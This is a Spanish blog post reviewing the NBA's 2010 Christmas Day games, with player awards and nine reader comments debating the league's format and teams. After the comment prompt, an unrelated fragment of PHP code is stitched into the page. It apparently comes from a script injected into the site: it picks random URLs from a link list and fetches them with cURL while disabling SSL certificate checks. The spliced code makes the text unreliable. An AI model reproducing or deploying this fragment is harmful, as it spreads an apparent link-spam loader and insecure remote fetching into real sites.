La Crónica (25/12/2010)

26 de December de 2010 por TheDeerHunter

Día de Navidad y, como nos tienen acostumbrados, día grande de temporada regular en la NBA.

El menú se componía para empezar de un extraordinario Chicago@New York en el inmejorable escenario del Madison Square Garden. Unos Knicks en estado de gracia hicieron inútil cualquier alternativa defensiva que puso sobre la mesa Tom Thibodeau. Con un 12 de 22 en triples para un total de 42 de 79 en tiros de campo (53,2%) cada uno de los componentes de la plantilla que gestiona D’Antoni puso su valioso grano de arena para funcionar colectivamente con la precisión de un reloj. Además de la eficaz anotación, 11 asistencias y 5 robos de Felton, más de 10 rebotes de Chandler, Fields y Stoudemire y 6 tapones de éste último… Bastante tuvieron los Bulls con no volver al avión con una paliza en la maleta. A base de arranques de garra y talento de Rose y Boozer vendieron su piel cara. Faltó más ayuda por parte de Deng, entre otros.

Tras haber roto la racha de San Antonio, ayer los Magic se lo hicieron a los Celtics. En esta ocasión lo hicieron desde la defensa provocando un partido para olvidar de Allen y Nate Robinson. Howard se limitó a cerrar dentro con más tapones que lanzamientos a canasta, pero gran partido de Turkoglu y Brandon Bass, además de Redick y Anderson desde el banco. Con recuperar a todos estos ya sería un gran acierto lo del traspaso.

En cambio, los Lakers se llevaron el correctivo de la noche en casa contra Miami. El Big Three playero le ganó la tostada al formado por Kobe, Odom y Pau, sobre todo en términos defensivos. Los amarillos no encontraron la manera para controlar a LeBron, con otro bestial triple doble, ni a Bosh. No les hizo ni falta un gran partido de Wade. Tiene que mejorar mucho el equipo de Phil Jackson para pensar que esta podría ser la finalísima de Mayo.

Después hubiéramos podido disfrutar del mejor duelo de pistoleros actual entre Durant y Melo, pero éste tampoco jugó por sus motivos personales que todos conocemos. A pesar de que Durantula se cebó con 44 puntos casi sin oposición, los Nuggets plantaron cara con el mejor partido del curso de Chancey Billups, un buen partido de Nené y la irrupción de Ty Lawson. Les falló un punto de defensa. El lado positivo es que recuperaron a Kenyon Martin.

Por último otro partidazo entre Portland y Warriors. Volvía Curry y Ellis lo celebró con 39 puntacos con los que selló la victoria. Gran partido de Batum y Matthews que sirvió de muy poco.

PREMIOS

MVP: Conseguir un triple doble en el Staples Center solo está al alcance de jugadores como Lebron James. Anoche liquidó a los Lakers con 27 puntos, 11 rebotes, 10 asistencias y la ayuda de un Chris Bosh también descomunal (24 puntos y 13 rebotes). Seguramente Kevin Durant sea de los pocos que también esté capacitado para hacer algo parecido como demostró anoche con 44 puntos, 7 rebotes y 4 asistencias.

Rookie: En NY deben seguir frotándose los ojos cada vez que terminaun partido de Landry Fields. Anoche fueron 14 puntos y 11 rebotes, hecho que ya no sorprende tanto.

Sorpresa: La ausencia de Brandon Roy provoca que el no haya un líder claro en los Blazers. Anoche su mejor jugador fue Nicolas Batum con 18 puntos, 10 rebotes y 4 asistencias.

Decepción: La derrota de los Celtics fue producto, en buena parte, del 9 de 40 que se marcaron entre Nate Robinson, Ray Allen y Glen Davis.

Esfuerzo en vano: Los 30 puntos de Chauncey Billups y los 25 puntos, 7 rebotes, 8 asistencias y 6 robos de Derrick Rose no encontraron la recompensa de la victoria.

Comenta

9 comentarios a esta entrada

  1. Sancho88 dice:
    #1

    Que bonitos partidos en navidad joe. Así da gusto ver NBA. Igual la idea de James no es tan descabellada. Así, cada dos o tres días tendríamos jornadas con grandes partidos y nos lo pasaríamos mucho mejor. Es que hay que reconocer que hay equipos que parecen más de la D-League que de la NBA. Mis pobres Kings, por ejemplo. Este año Tyreke está jodido con sus pies, que le estan dando mazo de problemas. Y tenemos que confiar todo a Cousins, que el hombre tiene mucho potencial, pero de momento poca cabeza. Y despues, Udrih, Casspi, Landry… que son los que tiran del carro, sinceramente, no tendrian sitio en un equipo de playoff. Entonces, al final se estan haciendo franquicias que pase lo que pase nunca pueden aspirar a nada grande. y en abril ya se despiden hasta finales de octubre, sin competir realmente contra ningún equipo. Grizzlies, Clippers, Kings, Nets, Cavs, Pistons, Warriors, Wolves, Wizards… Así, gente como Mayo, Griffin, Brook Lopez, Hickson, Evans, Cousins, Curry, Love, Beasley, Wall… que realmente son jovenes con mucho potencial y podrían tener un gran futuro en la liga, no saben lo que es competir a no ser que tengan suerte y los fiche un grande o vayan a la seleccion. No creo que sea un secreto el fracaso profesional de Vince Carter y su primo T-Mac, jugadores que han ganado mucha pasta pero nunca le han visto ni de lejos el brillo de oro al trofeo de la liga. Y en sus buenas épocas si que merecieron protagonizar grandes hazañas en finales de NBA.

    No sé que creeis vosotros. Si quitaran estas franquicias deficitarias y aburridas, organizaran mejor la liga en dos divisiones por conferencia, con 6 equipos por division, 24 en total… joe, podria tener mas vidilla la liga. Y en vez de eliminatorias por el titulo entre 16 equipos, joder, confrontad a los 8 mejores en unos cuartos de final, y asi podriamos ver un partido como el de esta noche, Miami – Lakers en cuartos, un Orlando – San antonio, un Dallas – Atlanta y un Boston – Oklahoma, por poner un ejemplo. Hostia puta, la liga seria de una calidad flipante.

    Bueno, creo que me he rayao un poco, jeje. Seguimos con el debate abierto por James?

    Cual es vuestra opinion?

      Citar

  2. Sancho88 dice:
    #2

    Por cierto, rectifico lo de Carter que creo que si q le jugo una final a los Spurs. Aun así, creo que si se ha entendido mi idea. jeje. Feliz navidad!!

      Citar

  3. Denise dice:
    #3

    Vaya merienda de Heat en el Staples. Sigo teniendo a Lakers como favoritos nº1 y mejor equipo de la NBA, pero las dos ultiams palizas en casa hace que Phil tenga que cambiar algo, en mi opinión Brown debería jugar mas minutos como 1, porque ni Fisher ni Blake están bien ultimamente. Y visto el nivel irregular de Artest, y que Walton no me parece un jugador valido para la NBA, metería poco a poco en la rotación a Ebanks, que lo poco que he visto de él me ha gustado, le daría sus 6-10 minutillos por partido.
    En los Heat, espectacular James, me está sorprendiendo su “amabilidad” para pasar la pelota aunque esté on-fire, y ayer ví al Bosh más duro que recuerdo.
    En el Magic-Celtics, buen partido defensivo de ambos que al fianl se decantó para los de Florida. Horribles partidos de Robinson (Vilma!!!), Allen y Arenas (saliendo desde el banco), J- Rich no está muy fino tampoco, y buen trabajo del siempre criticado por mí Redick, de Ryan Anderson, y partido excepcional en ataque de Bass, al que Van Gundy no daba bola el año pasado.
    Lo positivo: Que Duhon y Quentin no entran ya en la rotación.
    Lo negativo: ¿Por qué a Howard le meten tan pocos balones?

    Lebron tiene toda la razón, Ya dije el otro día cuales franquicias me sobraban. El nivel medio de los equipos subiría, y veriamos plantillas excepcionales, no sólo buenos quintetos con pesimos banquillos, que es lo que propicia el sistema actual. ACon este formato hay muchísimos partidos infumables, quién puede ver un Cavs-Raptors o un Kings-Bobcats por ejemplo.

      Citar

  4. Txusma dice:
    #4

    El promedio de asistencias de Lebron es altísimo para un alero. El año pasado fue un escándalo y llegó a las 8’6 por partido. Este año “solo” está en 7.2. Vamos, que siempre ha pasado la pelota.

      Citar

  5. Denise dice:
    #5

    Pero en Cavs no jugaba con 2 estrellas NBA al lado. Pensaba que se iba a producir una lucha interna de “haber quien mete más puntos, y por ende tirar todo lo que llegue a las manos”, además, pensaba que Wade iba a tener más tiempo la bola en este equipo. Para ser Miami “el equipo de Wade” por llevar toda la vida allí, no hay duda de que el jefe está siendo Lebron.

      Citar

  6. Denise dice:
    #6

    Mc Gee y Blatche suspendidos un partido por su equipo. Presuntamente por liarla en un pub.

      Citar

  7. Toni dice:
    #7

    Estos Wizards no ganan pa’ disgustos… Y primer aviso a tomar en cuenta para los Lakers porque a mi no me molaria que encima que juego el dia de navidad me pasen por encima Lebron&co.
    A ver si estos Magic se estabilizan porque si llegan con 2-3 jugadores con buen estado de forma a playoff pueden dar algun susto considerable.

      Citar

  8. Txusma dice:
    #8

    La verdad es que sería tonto que Lebron y Bosh fueran a Miami renunciado a buena parte del salario que podrían cobrar en otro sitio para luego tener problemas de celos y egos. Tienen muy clarito a qué están jugando y más les vale a los Lakers no confiarse “ni mijita”.

    Y se confirma que Blatche es otro del club “cabecita loca”

      Citar

  9. Sempren dice:
    #9

    Tremenda la defensa de los de Florida, tremenda, que siempre llegaban a los pases extra de los Lakers, o con ayudas que llegaron muy lejos.
    Me gustaría destacar el aumento de minutos de Dampier e Ilgauskas en detrimento de Joel Anthony, jugador que a pesar de no estar haciéndolo muy mal, no me parecía digno de tantos minutos en un aspirante al anillo como Miami.

    Artest es único, con él en cancha (y sobre todo participando del juego ofensivo) es como jugar a la lotería: tan pronto coge un gran rebote o roba un balón muy bueno, como tira fatal con mucha precipitación o la pierde él solito, acabando en el banquillo visitante xD (en esa jugada yo ya iba pensando que menos mirar a todos lados y más centrarse en el balón, que el bote no es lo suyo…).

    También quería comentar, aunque no sea un día demasiado propicio por su derrota, que los Nuggets me parecen peligrosos. El problema es que no tienen grandes conjuntos como Mavs o Spurs, y dependen de la inspiración/concentración de dos jugadores de fácil despiste como Melo y JR, pero con la recuperación de Martin y Birdman Andersen ya juntan un juego interior importante (con Nene y Harrington más por fuera), y tienen a dos bases más que competentes, además de un Afflalo que defiende y tira bastante bien.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>